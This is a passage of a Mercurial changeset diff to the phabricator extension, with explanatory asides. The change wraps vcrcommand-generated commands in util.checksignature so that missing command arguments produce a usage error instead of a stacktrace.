phabricator: avoid a stacktrace when command arguments are missing...
Matt Harbison
r44918:09f3e003 default
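The change below makes vcrcommand() wrap each generated command with
Mercurial's util.checksignature() before registering it, so that running a
phabricator command with missing or extra arguments is reported as the usual
"invalid arguments" usage error instead of an unhandled TypeError stacktrace.
A minimal sketch of the mechanism (paraphrased from mercurial/util.py, not
part of this changeset; ``depth`` is the number of traceback frames expected
when the TypeError comes from the wrapped call itself):

    import sys
    import traceback

    from mercurial import error

    def checksignature(func, depth=1):
        """wrap a function with code to check for calling errors"""

        def check(*args, **kwargs):
            try:
                return func(*args, **kwargs)
            except TypeError:
                # A TypeError raised directly by the call into ``func`` has a
                # traceback of exactly ``depth`` frames and is treated as a
                # signature mismatch; anything deeper is a genuine bug in the
                # command and is re-raised unchanged.
                if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
                    raise error.SignatureError
                raise

        return check

The ``depth=2`` in the change accounts for the extra ``inner`` wrapper frame
that vcrcommand() inserts between dispatch and the real command function.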
@@ -1,1828 +1,1830 @@
# phabricator.py - simple Phabricator integration
#
# Copyright 2017 Facebook, Inc.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""simple Phabricator integration (EXPERIMENTAL)

This extension provides a ``phabsend`` command which sends a stack of
changesets to Phabricator, and a ``phabread`` command which prints a stack of
revisions in a format suitable for :hg:`import`, and a ``phabupdate`` command
to update statuses in batch.

A "phabstatus" view for :hg:`show` is also provided; it displays status
information of Phabricator differentials associated with unfinished
changesets.

By default, Phabricator requires a ``Test Plan``, which might prevent some
changesets from being sent. The requirement can be disabled by changing the
``differential.require-test-plan-field`` config server side.

Config::

    [phabricator]
    # Phabricator URL
    url = https://phab.example.com/

    # Repo callsign. If a repo has a URL https://$HOST/diffusion/FOO, then its
    # callsign is "FOO".
    callsign = FOO

    # curl command to use. If not set (default), use builtin HTTP library to
    # communicate. If set, use the specified curl command. This could be useful
    # if you need to specify advanced options that are not easily supported by
    # the internal library.
    curlcmd = curl --connect-timeout 2 --retry 3 --silent

    [auth]
    example.schemes = https
    example.prefix = phab.example.com

    # API token. Get it from https://$HOST/conduit/login/
    example.phabtoken = cli-xxxxxxxxxxxxxxxxxxxxxxxxxxxx
"""

from __future__ import absolute_import

import base64
import contextlib
import hashlib
import itertools
import json
import mimetypes
import operator
import re

from mercurial.node import bin, nullid
from mercurial.i18n import _
from mercurial.pycompat import getattr
from mercurial.thirdparty import attr
from mercurial import (
    cmdutil,
    context,
    encoding,
    error,
    exthelper,
    graphmod,
    httpconnection as httpconnectionmod,
    localrepo,
    logcmdutil,
    match,
    mdiff,
    obsutil,
    parser,
    patch,
    phases,
    pycompat,
    scmutil,
    smartset,
    tags,
    templatefilters,
    templateutil,
    url as urlmod,
    util,
)
from mercurial.utils import (
    procutil,
    stringutil,
)
from . import show


# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
# be specifying the version(s) of Mercurial they are tested with, or
# leave the attribute unspecified.
testedwith = b'ships-with-hg-core'

eh = exthelper.exthelper()

cmdtable = eh.cmdtable
command = eh.command
configtable = eh.configtable
templatekeyword = eh.templatekeyword
uisetup = eh.finaluisetup

# developer config: phabricator.batchsize
eh.configitem(
    b'phabricator', b'batchsize', default=12,
)
eh.configitem(
    b'phabricator', b'callsign', default=None,
)
eh.configitem(
    b'phabricator', b'curlcmd', default=None,
)
# developer config: phabricator.repophid
eh.configitem(
    b'phabricator', b'repophid', default=None,
)
eh.configitem(
    b'phabricator', b'url', default=None,
)
eh.configitem(
    b'phabsend', b'confirm', default=False,
)

colortable = {
    b'phabricator.action.created': b'green',
    b'phabricator.action.skipped': b'magenta',
    b'phabricator.action.updated': b'magenta',
    b'phabricator.desc': b'',
    b'phabricator.drev': b'bold',
    b'phabricator.node': b'',
    b'phabricator.status.abandoned': b'magenta dim',
    b'phabricator.status.accepted': b'green bold',
    b'phabricator.status.closed': b'green',
    b'phabricator.status.needsreview': b'yellow',
    b'phabricator.status.needsrevision': b'red',
    b'phabricator.status.changesplanned': b'red',
}

_VCR_FLAGS = [
    (
        b'',
        b'test-vcr',
        b'',
        _(
            b'Path to a vcr file. If nonexistent, will record a new vcr transcript'
            b', otherwise will mock all http requests using the specified vcr file.'
            b' (ADVANCED)'
        ),
    ),
]


@eh.wrapfunction(localrepo, "loadhgrc")
def _loadhgrc(orig, ui, wdirvfs, hgvfs, requirements):
    """Load ``.arcconfig`` content into a ui instance on repository open.
    """
    result = False
    arcconfig = {}

    try:
        # json.loads only accepts bytes from 3.6+
        rawparams = encoding.unifromlocal(wdirvfs.read(b".arcconfig"))
        # json.loads only returns unicode strings
        arcconfig = pycompat.rapply(
            lambda x: encoding.unitolocal(x)
            if isinstance(x, pycompat.unicode)
            else x,
            pycompat.json_loads(rawparams),
        )

        result = True
    except ValueError:
        ui.warn(_(b"invalid JSON in %s\n") % wdirvfs.join(b".arcconfig"))
    except IOError:
        pass

    cfg = util.sortdict()

    if b"repository.callsign" in arcconfig:
        cfg[(b"phabricator", b"callsign")] = arcconfig[b"repository.callsign"]

    if b"phabricator.uri" in arcconfig:
        cfg[(b"phabricator", b"url")] = arcconfig[b"phabricator.uri"]

    if cfg:
        ui.applyconfig(cfg, source=wdirvfs.join(b".arcconfig"))

    return orig(ui, wdirvfs, hgvfs, requirements) or result  # Load .hg/hgrc

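For reference, a minimal ``.arcconfig`` that this wrapper picks up could look
like this (illustrative values; the two keys are exactly the ones read above):

    {
        "phabricator.uri": "https://phab.example.com/",
        "repository.callsign": "FOO"
    }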

def vcrcommand(name, flags, spec, helpcategory=None, optionalrepo=False):
    fullflags = flags + _VCR_FLAGS

    def hgmatcher(r1, r2):
        if r1.uri != r2.uri or r1.method != r2.method:
            return False
        r1params = util.urlreq.parseqs(r1.body)
        r2params = util.urlreq.parseqs(r2.body)
        for key in r1params:
            if key not in r2params:
                return False
            value = r1params[key][0]
            # we want to compare json payloads without worrying about ordering
            if value.startswith(b'{') and value.endswith(b'}'):
                r1json = pycompat.json_loads(value)
                r2json = pycompat.json_loads(r2params[key][0])
                if r1json != r2json:
                    return False
            elif r2params[key][0] != value:
                return False
        return True

    def sanitiserequest(request):
        request.body = re.sub(
            br'cli-[a-z0-9]+', br'cli-hahayouwish', request.body
        )
        return request

    def sanitiseresponse(response):
        if 'set-cookie' in response['headers']:
            del response['headers']['set-cookie']
        return response

    def decorate(fn):
        def inner(*args, **kwargs):
            cassette = pycompat.fsdecode(kwargs.pop('test_vcr', None))
            if cassette:
                import hgdemandimport

                with hgdemandimport.deactivated():
                    import vcr as vcrmod
                    import vcr.stubs as stubs

                    vcr = vcrmod.VCR(
                        serializer='json',
                        before_record_request=sanitiserequest,
                        before_record_response=sanitiseresponse,
                        custom_patches=[
                            (
                                urlmod,
                                'httpconnection',
                                stubs.VCRHTTPConnection,
                            ),
                            (
                                urlmod,
                                'httpsconnection',
                                stubs.VCRHTTPSConnection,
                            ),
                        ],
                    )
                    vcr.register_matcher('hgmatcher', hgmatcher)
                    with vcr.use_cassette(cassette, match_on=['hgmatcher']):
                        return fn(*args, **kwargs)
            return fn(*args, **kwargs)

-        inner.__name__ = fn.__name__
-        inner.__doc__ = fn.__doc__
+        cmd = util.checksignature(inner, depth=2)
+        cmd.__name__ = fn.__name__
+        cmd.__doc__ = fn.__doc__
+
        return command(
            name,
            fullflags,
            spec,
            helpcategory=helpcategory,
            optionalrepo=optionalrepo,
-        )(inner)
+        )(cmd)

    return decorate


def urlencodenested(params):
    """like urlencode, but works with nested parameters.

    For example, if params is {'a': ['b', 'c'], 'd': {'e': 'f'}}, it will be
    flattened to {'a[0]': 'b', 'a[1]': 'c', 'd[e]': 'f'} and then passed to
    urlencode. Note: the encoding is consistent with PHP's http_build_query.
    """
    flatparams = util.sortdict()

    def process(prefix, obj):
        if isinstance(obj, bool):
            obj = {True: b'true', False: b'false'}[obj]  # Python -> PHP form
        lister = lambda l: [(b'%d' % k, v) for k, v in enumerate(l)]
        items = {list: lister, dict: lambda x: x.items()}.get(type(obj))
        if items is None:
            flatparams[prefix] = obj
        else:
            for k, v in items(obj):
                if prefix:
                    process(b'%s[%s]' % (prefix, k), v)
                else:
                    process(k, v)

    process(b'', params)
    return util.urlreq.urlencode(flatparams)
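As a concrete illustration of the flattening described in the docstring, the
following (hypothetical) call should produce the PHP-style form encoding,
with the brackets percent-encoded by urlencode:

    >>> urlencodenested({b'a': [b'b', b'c'], b'd': {b'e': b'f'}})
    'a%5B0%5D=b&a%5B1%5D=c&d%5Be%5D=f'

which decodes to ``a[0]=b&a[1]=c&d[e]=f``.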


def readurltoken(ui):
    """return conduit url, token and make sure they exist

    Currently read from [auth] config section. In the future, it might
    make sense to read from .arcconfig and .arcrc as well.
    """
    url = ui.config(b'phabricator', b'url')
    if not url:
        raise error.Abort(
            _(b'config %s.%s is required') % (b'phabricator', b'url')
        )

    res = httpconnectionmod.readauthforuri(ui, url, util.url(url).user)
    token = None

    if res:
        group, auth = res

        ui.debug(b"using auth.%s.* for authentication\n" % group)

        token = auth.get(b'phabtoken')

    if not token:
        raise error.Abort(
            _(b'Can\'t find conduit token associated to %s') % (url,)
        )

    return url, token


def callconduit(ui, name, params):
    """call Conduit API, params is a dict. return json.loads result, or None"""
    host, token = readurltoken(ui)
    url, authinfo = util.url(b'/'.join([host, b'api', name])).authinfo()
    ui.debug(b'Conduit Call: %s %s\n' % (url, pycompat.byterepr(params)))
    params = params.copy()
    params[b'__conduit__'] = {
        b'token': token,
    }
    rawdata = {
        b'params': templatefilters.json(params),
        b'output': b'json',
        b'__conduit__': 1,
    }
    data = urlencodenested(rawdata)
    curlcmd = ui.config(b'phabricator', b'curlcmd')
    if curlcmd:
        sin, sout = procutil.popen2(
            b'%s -d @- %s' % (curlcmd, procutil.shellquote(url))
        )
        sin.write(data)
        sin.close()
        body = sout.read()
    else:
        urlopener = urlmod.opener(ui, authinfo)
        request = util.urlreq.request(pycompat.strurl(url), data=data)
        with contextlib.closing(urlopener.open(request)) as rsp:
            body = rsp.read()
    ui.debug(b'Conduit Response: %s\n' % body)
    parsed = pycompat.rapply(
        lambda x: encoding.unitolocal(x)
        if isinstance(x, pycompat.unicode)
        else x,
        # json.loads only accepts bytes from py3.6+
        pycompat.json_loads(encoding.unifromlocal(body)),
    )
    if parsed.get(b'error_code'):
        msg = _(b'Conduit Error (%s): %s') % (
            parsed[b'error_code'],
            parsed[b'error_info'],
        )
        raise error.Abort(msg)
    return parsed[b'result']


@vcrcommand(b'debugcallconduit', [], _(b'METHOD'), optionalrepo=True)
def debugcallconduit(ui, repo, name):
    """call Conduit API

    Call parameters are read from stdin as a JSON blob. Result will be written
    to stdout as a JSON blob.
    """
    # json.loads only accepts bytes from 3.6+
    rawparams = encoding.unifromlocal(ui.fin.read())
    # json.loads only returns unicode strings
    params = pycompat.rapply(
        lambda x: encoding.unitolocal(x)
        if isinstance(x, pycompat.unicode)
        else x,
        pycompat.json_loads(rawparams),
    )
    # json.dumps only accepts unicode strings
    result = pycompat.rapply(
        lambda x: encoding.unifromlocal(x) if isinstance(x, bytes) else x,
        callconduit(ui, name, params),
    )
    s = json.dumps(result, sort_keys=True, indent=2, separators=(u',', u': '))
    ui.write(b'%s\n' % encoding.unitolocal(s))
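As a usage sketch, assuming a configured ``[phabricator]`` url and an [auth]
token: ``echo '{}' | hg debugcallconduit conduit.ping`` feeds the empty JSON
parameter blob to the standard ``conduit.ping`` method via callconduit() and
pretty-prints the server's JSON reply on stdout; any METHOD name is passed
through verbatim.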


def getrepophid(repo):
    """given callsign, return repository PHID or None"""
    # developer config: phabricator.repophid
    repophid = repo.ui.config(b'phabricator', b'repophid')
    if repophid:
        return repophid
    callsign = repo.ui.config(b'phabricator', b'callsign')
    if not callsign:
        return None
    query = callconduit(
        repo.ui,
        b'diffusion.repository.search',
        {b'constraints': {b'callsigns': [callsign]}},
    )
    if len(query[b'data']) == 0:
        return None
    repophid = query[b'data'][0][b'phid']
    repo.ui.setconfig(b'phabricator', b'repophid', repophid)
    return repophid


_differentialrevisiontagre = re.compile(br'\AD([1-9][0-9]*)\Z')
_differentialrevisiondescre = re.compile(
    br'^Differential Revision:\s*(?P<url>(?:.*)D(?P<id>[1-9][0-9]*))$', re.M
)
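For illustration, _differentialrevisiontagre matches whole local tag names
such as b'D1234', while _differentialrevisiondescre is meant to match the
"Differential Revision:" trailer in a commit message (hypothetical values):

    m = _differentialrevisiondescre.search(
        b'my change\n\nDifferential Revision: https://phab.example.com/D1234'
    )
    # m.group('url') == b'https://phab.example.com/D1234'
    # m.group('id') == b'1234'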


def getoldnodedrevmap(repo, nodelist):
    """find previous nodes that have been sent to Phabricator

    return {node: (oldnode, Differential diff, Differential Revision ID)}
    for node in nodelist with known previous sent versions, or associated
    Differential Revision IDs. ``oldnode`` and ``Differential diff`` could
    be ``None``.

    Examines commit messages like "Differential Revision:" to get the
    association information.

    If such a commit message line is not found, examines all precursors and
    their tags. Tags with format like "D1234" are considered a match and the
    node with that tag, and the number after "D" (ex. 1234) will be returned.

    The ``old node``, if not None, is guaranteed to be the last diff of
    corresponding Differential Revision, and exist in the repo.
    """
    unfi = repo.unfiltered()
    has_node = unfi.changelog.index.has_node

    result = {}  # {node: (oldnode?, lastdiff?, drev)}
    toconfirm = {}  # {node: (force, {precnode}, drev)}
    for node in nodelist:
        ctx = unfi[node]
        # For tags like "D123", put them into "toconfirm" to verify later
        precnodes = list(obsutil.allpredecessors(unfi.obsstore, [node]))
        for n in precnodes:
            if has_node(n):
                for tag in unfi.nodetags(n):
                    m = _differentialrevisiontagre.match(tag)
                    if m:
                        toconfirm[node] = (0, set(precnodes), int(m.group(1)))
                        break
                else:
                    continue  # move to next predecessor
                break  # found a tag, stop
        else:
            # Check commit message
            m = _differentialrevisiondescre.search(ctx.description())
            if m:
                toconfirm[node] = (1, set(precnodes), int(m.group('id')))

    # Double check if tags are genuine by collecting all old nodes from
    # Phabricator, and expect precursors overlap with it.
    if toconfirm:
        drevs = [drev for force, precs, drev in toconfirm.values()]
        alldiffs = callconduit(
            unfi.ui, b'differential.querydiffs', {b'revisionIDs': drevs}
        )
        getnode = lambda d: bin(getdiffmeta(d).get(b'node', b'')) or None
        for newnode, (force, precset, drev) in toconfirm.items():
            diffs = [
                d for d in alldiffs.values() if int(d[b'revisionID']) == drev
            ]

            # "precursors" as known by Phabricator
            phprecset = set(getnode(d) for d in diffs)

            # Ignore if precursors (Phabricator and local repo) do not overlap,
            # and force is not set (when commit message says nothing)
            if not force and not bool(phprecset & precset):
                tagname = b'D%d' % drev
                tags.tag(
                    repo,
                    tagname,
                    nullid,
                    message=None,
                    user=None,
                    date=None,
                    local=True,
                )
                unfi.ui.warn(
                    _(
                        b'D%d: local tag removed - does not match '
                        b'Differential history\n'
                    )
                    % drev
                )
                continue

            # Find the last node using Phabricator metadata, and make sure it
            # exists in the repo
            oldnode = lastdiff = None
            if diffs:
                lastdiff = max(diffs, key=lambda d: int(d[b'id']))
                oldnode = getnode(lastdiff)
                if oldnode and not has_node(oldnode):
                    oldnode = None

            result[newnode] = (oldnode, lastdiff, drev)

    return result


def getdrevmap(repo, revs):
    """Return a dict mapping each rev in `revs` to its Differential Revision
    ID or None.
    """
    result = {}
    for rev in revs:
        result[rev] = None
        ctx = repo[rev]
        # Check commit message
        m = _differentialrevisiondescre.search(ctx.description())
        if m:
            result[rev] = int(m.group('id'))
            continue
        # Check tags
        for tag in repo.nodetags(ctx.node()):
            m = _differentialrevisiontagre.match(tag)
            if m:
                result[rev] = int(m.group(1))
                break

    return result


def getdiff(ctx, diffopts):
    """plain-text diff without header (user, commit message, etc)"""
    output = util.stringio()
    for chunk, _label in patch.diffui(
        ctx.repo(), ctx.p1().node(), ctx.node(), None, opts=diffopts
    ):
        output.write(chunk)
    return output.getvalue()


class DiffChangeType(object):
    ADD = 1
    CHANGE = 2
    DELETE = 3
    MOVE_AWAY = 4
    COPY_AWAY = 5
    MOVE_HERE = 6
    COPY_HERE = 7
    MULTICOPY = 8


class DiffFileType(object):
    TEXT = 1
    IMAGE = 2
    BINARY = 3


@attr.s
class phabhunk(dict):
    """Represents a Differential hunk, which is owned by a Differential change
    """

    oldOffset = attr.ib(default=0)  # camelcase-required
    oldLength = attr.ib(default=0)  # camelcase-required
    newOffset = attr.ib(default=0)  # camelcase-required
    newLength = attr.ib(default=0)  # camelcase-required
    corpus = attr.ib(default='')
    # These get added to the phabchange's equivalents
    addLines = attr.ib(default=0)  # camelcase-required
    delLines = attr.ib(default=0)  # camelcase-required


@attr.s
class phabchange(object):
    """Represents a Differential change, owns Differential hunks and owned by a
    Differential diff. Each one represents one file in a diff.
    """

    currentPath = attr.ib(default=None)  # camelcase-required
    oldPath = attr.ib(default=None)  # camelcase-required
    awayPaths = attr.ib(default=attr.Factory(list))  # camelcase-required
    metadata = attr.ib(default=attr.Factory(dict))
    oldProperties = attr.ib(default=attr.Factory(dict))  # camelcase-required
    newProperties = attr.ib(default=attr.Factory(dict))  # camelcase-required
    type = attr.ib(default=DiffChangeType.CHANGE)
    fileType = attr.ib(default=DiffFileType.TEXT)  # camelcase-required
    commitHash = attr.ib(default=None)  # camelcase-required
    addLines = attr.ib(default=0)  # camelcase-required
    delLines = attr.ib(default=0)  # camelcase-required
    hunks = attr.ib(default=attr.Factory(list))

    def copynewmetadatatoold(self):
        for key in list(self.metadata.keys()):
            newkey = key.replace(b'new:', b'old:')
            self.metadata[newkey] = self.metadata[key]

    def addoldmode(self, value):
        self.oldProperties[b'unix:filemode'] = value

    def addnewmode(self, value):
        self.newProperties[b'unix:filemode'] = value

    def addhunk(self, hunk):
        if not isinstance(hunk, phabhunk):
            raise error.Abort(b'phabchange.addhunk only takes phabhunks')
        self.hunks.append(pycompat.byteskwargs(attr.asdict(hunk)))
        # It's useful to include these stats since the Phab web UI shows them,
        # and uses them to estimate how large a change a Revision is. Also used
        # in email subjects for the [+++--] bit.
        self.addLines += hunk.addLines
        self.delLines += hunk.delLines


@attr.s
class phabdiff(object):
    """Represents a Differential diff, owns Differential changes. Corresponds
    to a commit.
    """

    # Doesn't seem to be any reason to send this (output of uname -n)
    sourceMachine = attr.ib(default=b'')  # camelcase-required
    sourcePath = attr.ib(default=b'/')  # camelcase-required
    sourceControlBaseRevision = attr.ib(default=b'0' * 40)  # camelcase-required
    sourceControlPath = attr.ib(default=b'/')  # camelcase-required
    sourceControlSystem = attr.ib(default=b'hg')  # camelcase-required
    branch = attr.ib(default=b'default')
    bookmark = attr.ib(default=None)
    creationMethod = attr.ib(default=b'phabsend')  # camelcase-required
    lintStatus = attr.ib(default=b'none')  # camelcase-required
    unitStatus = attr.ib(default=b'none')  # camelcase-required
    changes = attr.ib(default=attr.Factory(dict))
    repositoryPHID = attr.ib(default=None)  # camelcase-required

    def addchange(self, change):
        if not isinstance(change, phabchange):
            raise error.Abort(b'phabdiff.addchange only takes phabchanges')
        self.changes[change.currentPath] = pycompat.byteskwargs(
            attr.asdict(change)
        )


def maketext(pchange, ctx, fname):
    """populate the phabchange for a text file"""
    repo = ctx.repo()
    fmatcher = match.exact([fname])
    diffopts = mdiff.diffopts(git=True, context=32767)
    _pfctx, _fctx, header, fhunks = next(
        patch.diffhunks(repo, ctx.p1(), ctx, fmatcher, opts=diffopts)
    )

    for fhunk in fhunks:
        (oldOffset, oldLength, newOffset, newLength), lines = fhunk
        corpus = b''.join(lines[1:])
        shunk = list(header)
        shunk.extend(lines)
        _mf, _mt, addLines, delLines, _hb = patch.diffstatsum(
            patch.diffstatdata(util.iterlines(shunk))
        )
        pchange.addhunk(
            phabhunk(
                oldOffset,
                oldLength,
                newOffset,
                newLength,
                corpus,
                addLines,
                delLines,
            )
        )


def uploadchunks(fctx, fphid):
    """upload large binary files as separate chunks.
    Phab requests chunking over 8MiB, and splits into 4MiB chunks
    """
    ui = fctx.repo().ui
    chunks = callconduit(ui, b'file.querychunks', {b'filePHID': fphid})
    with ui.makeprogress(
        _(b'uploading file chunks'), unit=_(b'chunks'), total=len(chunks)
    ) as progress:
        for chunk in chunks:
            progress.increment()
            if chunk[b'complete']:
                continue
            bstart = int(chunk[b'byteStart'])
            bend = int(chunk[b'byteEnd'])
            callconduit(
                ui,
                b'file.uploadchunk',
                {
                    b'filePHID': fphid,
                    b'byteStart': bstart,
                    b'data': base64.b64encode(fctx.data()[bstart:bend]),
                    b'dataEncoding': b'base64',
                },
            )


def uploadfile(fctx):
    """upload binary files to Phabricator"""
    repo = fctx.repo()
    ui = repo.ui
    fname = fctx.path()
    size = fctx.size()
    fhash = pycompat.bytestr(hashlib.sha256(fctx.data()).hexdigest())

    # an allocate call is required first to see if an upload is even required
    # (Phab might already have it) and to determine if chunking is needed
    allocateparams = {
        b'name': fname,
        b'contentLength': size,
        b'contentHash': fhash,
    }
    filealloc = callconduit(ui, b'file.allocate', allocateparams)
    fphid = filealloc[b'filePHID']

    if filealloc[b'upload']:
        ui.write(_(b'uploading %s\n') % bytes(fctx))
        if not fphid:
            uploadparams = {
                b'name': fname,
                b'data_base64': base64.b64encode(fctx.data()),
            }
            fphid = callconduit(ui, b'file.upload', uploadparams)
        else:
            uploadchunks(fctx, fphid)
    else:
        ui.debug(b'server already has %s\n' % bytes(fctx))

    if not fphid:
        raise error.Abort(b'Upload of %s failed.' % bytes(fctx))

    return fphid


def addoldbinary(pchange, oldfctx, fctx):
    """add the metadata for the previous version of a binary file to the
    phabchange for the new version

    ``oldfctx`` is the previous version of the file; ``fctx`` is the new
    version of the file, or None if the file is being removed.
    """
    if not fctx or fctx.cmp(oldfctx):
        # Files differ, add the old one
        pchange.metadata[b'old:file:size'] = oldfctx.size()
        mimeguess, _enc = mimetypes.guess_type(
            encoding.unifromlocal(oldfctx.path())
        )
        if mimeguess:
            pchange.metadata[b'old:file:mime-type'] = pycompat.bytestr(
                mimeguess
            )
        fphid = uploadfile(oldfctx)
        pchange.metadata[b'old:binary-phid'] = fphid
    else:
        # If it's left as IMAGE/BINARY web UI might try to display it
        pchange.fileType = DiffFileType.TEXT
        pchange.copynewmetadatatoold()


def makebinary(pchange, fctx):
    """populate the phabchange for a binary file"""
    pchange.fileType = DiffFileType.BINARY
    fphid = uploadfile(fctx)
    pchange.metadata[b'new:binary-phid'] = fphid
    pchange.metadata[b'new:file:size'] = fctx.size()
    mimeguess, _enc = mimetypes.guess_type(encoding.unifromlocal(fctx.path()))
    if mimeguess:
        mimeguess = pycompat.bytestr(mimeguess)
        pchange.metadata[b'new:file:mime-type'] = mimeguess
        if mimeguess.startswith(b'image/'):
            pchange.fileType = DiffFileType.IMAGE


# Copied from mercurial/patch.py
gitmode = {b'l': b'120000', b'x': b'100755', b'': b'100644'}


def notutf8(fctx):
    """detect non-UTF-8 text files since Phabricator requires them to be marked
    as binary
    """
    try:
        fctx.data().decode('utf-8')
        return False
    except UnicodeDecodeError:
        fctx.repo().ui.write(
            _(b'file %s detected as non-UTF-8, marked as binary\n')
            % fctx.path()
        )
        return True


def addremoved(pdiff, ctx, removed):
    """add removed files to the phabdiff. Shouldn't include moves"""
    for fname in removed:
        pchange = phabchange(
            currentPath=fname, oldPath=fname, type=DiffChangeType.DELETE
        )
        pchange.addoldmode(gitmode[ctx.p1()[fname].flags()])
        oldfctx = ctx.p1()[fname]
        if not (oldfctx.isbinary() or notutf8(oldfctx)):
            maketext(pchange, ctx, fname)

        pdiff.addchange(pchange)


def addmodified(pdiff, ctx, modified):
    """add modified files to the phabdiff"""
    for fname in modified:
        fctx = ctx[fname]
        oldfctx = fctx.p1()
        pchange = phabchange(currentPath=fname, oldPath=fname)
        filemode = gitmode[ctx[fname].flags()]
        originalmode = gitmode[ctx.p1()[fname].flags()]
        if filemode != originalmode:
            pchange.addoldmode(originalmode)
            pchange.addnewmode(filemode)

        if (
            fctx.isbinary()
            or notutf8(fctx)
            or oldfctx.isbinary()
            or notutf8(oldfctx)
        ):
            makebinary(pchange, fctx)
            addoldbinary(pchange, fctx.p1(), fctx)
        else:
            maketext(pchange, ctx, fname)

        pdiff.addchange(pchange)


def addadded(pdiff, ctx, added, removed):
    """add file adds to the phabdiff, both new files and copies/moves"""
    # Keep track of files that've been recorded as moved/copied, so if there are
    # additional copies we can mark them (moves get removed from removed)
    copiedchanges = {}
    movedchanges = {}
    for fname in added:
        fctx = ctx[fname]
        oldfctx = None
        pchange = phabchange(currentPath=fname)

        filemode = gitmode[ctx[fname].flags()]
        renamed = fctx.renamed()

        if renamed:
            originalfname = renamed[0]
            oldfctx = ctx.p1()[originalfname]
            originalmode = gitmode[oldfctx.flags()]
            pchange.oldPath = originalfname

            if originalfname in removed:
                origpchange = phabchange(
                    currentPath=originalfname,
                    oldPath=originalfname,
                    type=DiffChangeType.MOVE_AWAY,
                    awayPaths=[fname],
                )
                movedchanges[originalfname] = origpchange
                removed.remove(originalfname)
                pchange.type = DiffChangeType.MOVE_HERE
            elif originalfname in movedchanges:
                movedchanges[originalfname].type = DiffChangeType.MULTICOPY
                movedchanges[originalfname].awayPaths.append(fname)
                pchange.type = DiffChangeType.COPY_HERE
            else:  # pure copy
                if originalfname not in copiedchanges:
                    origpchange = phabchange(
                        currentPath=originalfname, type=DiffChangeType.COPY_AWAY
                    )
                    copiedchanges[originalfname] = origpchange
                else:
                    origpchange = copiedchanges[originalfname]
                origpchange.awayPaths.append(fname)
                pchange.type = DiffChangeType.COPY_HERE

            if filemode != originalmode:
                pchange.addoldmode(originalmode)
                pchange.addnewmode(filemode)
        else:  # Brand-new file
            pchange.addnewmode(gitmode[fctx.flags()])
            pchange.type = DiffChangeType.ADD

        if (
            fctx.isbinary()
            or notutf8(fctx)
            or (oldfctx and (oldfctx.isbinary() or notutf8(oldfctx)))
        ):
            makebinary(pchange, fctx)
            if renamed:
                addoldbinary(pchange, oldfctx, fctx)
        else:
            maketext(pchange, ctx, fname)

        pdiff.addchange(pchange)

    for _path, copiedchange in copiedchanges.items():
        pdiff.addchange(copiedchange)
    for _path, movedchange in movedchanges.items():
        pdiff.addchange(movedchange)

918
920
919 def creatediff(ctx):
921 def creatediff(ctx):
920 """create a Differential Diff"""
922 """create a Differential Diff"""
921 repo = ctx.repo()
923 repo = ctx.repo()
922 repophid = getrepophid(repo)
924 repophid = getrepophid(repo)
923 # Create a "Differential Diff" via "differential.creatediff" API
925 # Create a "Differential Diff" via "differential.creatediff" API
924 pdiff = phabdiff(
926 pdiff = phabdiff(
925 sourceControlBaseRevision=b'%s' % ctx.p1().hex(),
927 sourceControlBaseRevision=b'%s' % ctx.p1().hex(),
926 branch=b'%s' % ctx.branch(),
928 branch=b'%s' % ctx.branch(),
927 )
929 )
928 modified, added, removed, _d, _u, _i, _c = ctx.p1().status(ctx)
930 modified, added, removed, _d, _u, _i, _c = ctx.p1().status(ctx)
929 # addadded will remove moved files from removed, so addremoved won't get
931 # addadded will remove moved files from removed, so addremoved won't get
930 # them
932 # them
931 addadded(pdiff, ctx, added, removed)
933 addadded(pdiff, ctx, added, removed)
932 addmodified(pdiff, ctx, modified)
934 addmodified(pdiff, ctx, modified)
933 addremoved(pdiff, ctx, removed)
935 addremoved(pdiff, ctx, removed)
934 if repophid:
936 if repophid:
935 pdiff.repositoryPHID = repophid
937 pdiff.repositoryPHID = repophid
936 diff = callconduit(
938 diff = callconduit(
937 repo.ui,
939 repo.ui,
938 b'differential.creatediff',
940 b'differential.creatediff',
939 pycompat.byteskwargs(attr.asdict(pdiff)),
941 pycompat.byteskwargs(attr.asdict(pdiff)),
940 )
942 )
941 if not diff:
943 if not diff:
942 raise error.Abort(_(b'cannot create diff for %s') % ctx)
944 raise error.Abort(_(b'cannot create diff for %s') % ctx)
943 return diff
945 return diff


def writediffproperties(ctx, diff):
    """write metadata to diff so patches could be applied losslessly"""
    # creatediff returns with a diffid but query returns with an id
    diffid = diff.get(b'diffid', diff.get(b'id'))
    params = {
        b'diff_id': diffid,
        b'name': b'hg:meta',
        b'data': templatefilters.json(
            {
                b'user': ctx.user(),
                b'date': b'%d %d' % ctx.date(),
                b'branch': ctx.branch(),
                b'node': ctx.hex(),
                b'parent': ctx.p1().hex(),
            }
        ),
    }
    callconduit(ctx.repo().ui, b'differential.setdiffproperty', params)

    params = {
        b'diff_id': diffid,
        b'name': b'local:commits',
        b'data': templatefilters.json(
            {
                ctx.hex(): {
                    b'author': stringutil.person(ctx.user()),
                    b'authorEmail': stringutil.email(ctx.user()),
                    b'time': int(ctx.date()[0]),
                    b'commit': ctx.hex(),
                    b'parents': [ctx.p1().hex()],
                    b'branch': ctx.branch(),
                },
            }
        ),
    }
    callconduit(ctx.repo().ui, b'differential.setdiffproperty', params)


def createdifferentialrevision(
    ctx,
    revid=None,
    parentrevphid=None,
    oldnode=None,
    olddiff=None,
    actions=None,
    comment=None,
):
    """create or update a Differential Revision

    If revid is None, create a new Differential Revision, otherwise update
    revid. If parentrevphid is not None, set it as a dependency.

    If oldnode is not None, check if the patch content (without commit message
    and metadata) has changed before creating another diff.

    If actions is not None, they will be appended to the transaction.
    """
    repo = ctx.repo()
    if oldnode:
        diffopts = mdiff.diffopts(git=True, context=32767)
        oldctx = repo.unfiltered()[oldnode]
        neednewdiff = getdiff(ctx, diffopts) != getdiff(oldctx, diffopts)
    else:
        neednewdiff = True

    transactions = []
    if neednewdiff:
        diff = creatediff(ctx)
        transactions.append({b'type': b'update', b'value': diff[b'phid']})
        if comment:
            transactions.append({b'type': b'comment', b'value': comment})
    else:
        # Even if we don't need to upload a new diff because the patch content
        # did not change, we might still need to update its metadata so
        # pushers can know the correct node metadata.
        assert olddiff
        diff = olddiff
        writediffproperties(ctx, diff)

    # Set the parent Revision every time, so commit re-ordering is picked up
    if parentrevphid:
        transactions.append(
